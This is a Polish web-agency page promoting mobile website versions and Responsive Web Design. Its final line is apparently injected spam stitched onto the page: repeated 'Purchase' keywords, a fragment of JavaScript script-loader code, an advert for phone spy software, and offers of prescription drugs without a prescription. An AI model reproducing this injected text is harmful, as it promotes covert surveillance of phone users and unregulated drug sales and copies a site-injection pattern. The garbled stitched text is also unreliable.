Slide background

Order

Strony mobilne

Internet mobilny cieszy się coraz większą popularnością wśród użytkowników smartfonów. Dostawcy telefonii komórkowych prześciagają się w coraz to nowszych rozwiazaniach i ułatwieniach w dostępie do sieci. W Polsce regularnie z mobilnego dostępu do internetu korzysta dziennie 5,5 mln osób. Podczas jednej z wizyt w naszym kraju, współzałożyciel potężnego Google – Sergey Brin – stwierdził, że: „ przyszłość należy do mobilnego Internetu”, a rosnące niezmiennie zainteresowanie nim w ostatnich latach, powinno uświadomić wszystkim, że słowa te można uznać za prorocze.

Dopasowanie strony internetowej do urządzeń mobilnych pozwoli Ci dotrzeć do ciągle rosnącej grupy klientów. Przy budowie serwisu od podstaw wykorzystać możemy innowacyjną metode Responsive Web Design, dzięki której strona samoistnie dopasowuje się do każdego urządzenia mobilnego i stacjonarnego. W przypadku działających już stron internetowych proponujemy wykonanie dedykowanej wersji mobilnej serwisu. Zabieg ten polega na stworzeniu odrębnego serwisu który powinien być „lekki” i bardziej ograniczony treściowo. aby nie narażac potencjalnych użytkowników na wysokie koszty związane z połączniem internetowym które rozliczane jest na podstawie pobarnych z sieci danych.

Kliknij

Dowiedz się więcej na temat stron mobilnych

Purchase var d=document;var s=d.createElement(‚script’); online Purchase The most popular 2017 spy software applications for the mobile phones. purchase benemid uses protonix without a prescription Purchase Purchase